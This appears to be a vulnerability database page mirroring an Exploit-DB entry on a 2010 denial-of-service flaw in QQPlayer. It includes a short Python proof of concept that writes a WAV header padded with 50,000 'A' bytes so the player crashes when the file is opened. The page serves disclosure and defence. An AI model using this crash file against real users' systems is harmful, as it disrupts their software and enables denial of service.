QQPlayer 2.3.696.400p1(.wav) Denial of Service Vulnerability

vendor:

QQPlayer

by:

Hadji Samir

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: QQPlayer

Affected Version From: 2.3.696.400p1

Affected Version To: 2.3.696.400p1

Patch Exists: Yes

Related CWE: N/A

CPE: a:tencent:qqplayer:2.3.696.400p1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP sp2

2010

QQPlayer 2.3.696.400p1(.wav) Denial of Service Vulnerability

QQPlayer 2.3.696.400p1 is vulnerable to a denial of service attack when a specially crafted .wav file is opened. The crafted file contains a header followed by a large number of 'A' characters. When the file is opened, the application will crash.

Mitigation:

Update to the latest version of QQPlayer

Source

Exploit-DB raw data:

#!/usr/bin/python
#
###########################################################################################		
# Exploit Title:  QQPlayer 2.3.696.400p1(.wav) Denial of Service Vulnerability       
# Date:		  07-09-2010                                                            
# Author:	  Hadji Samir   , s-Dz[at]hotmail[dot]fr                                
# Software Link:  www.qq.com                                                            
# Version:        QQPlayer 2.3.696.400p1                                                
# Tested on:	  Windows XP sp2                                                        
# CVE :                                                                                 
# Notes:	  Working with filetype Mahboul-3lik.wav (.mp3,.3gp,.avi...)           
#                 Samir tjrs mahboul-3lik ...                                           
#                                                                                                                                
###########################################################################################	
  
boom =("\x52\x49\x46\x46\x24\x80\x03\x20\x57\x41\x56\x45\x20")
buff = ("\x41" * 50000 )
wizz = open("Mahboul-3lik.wav","w") 
wizz.write(boom + buff ) 
wizz.close()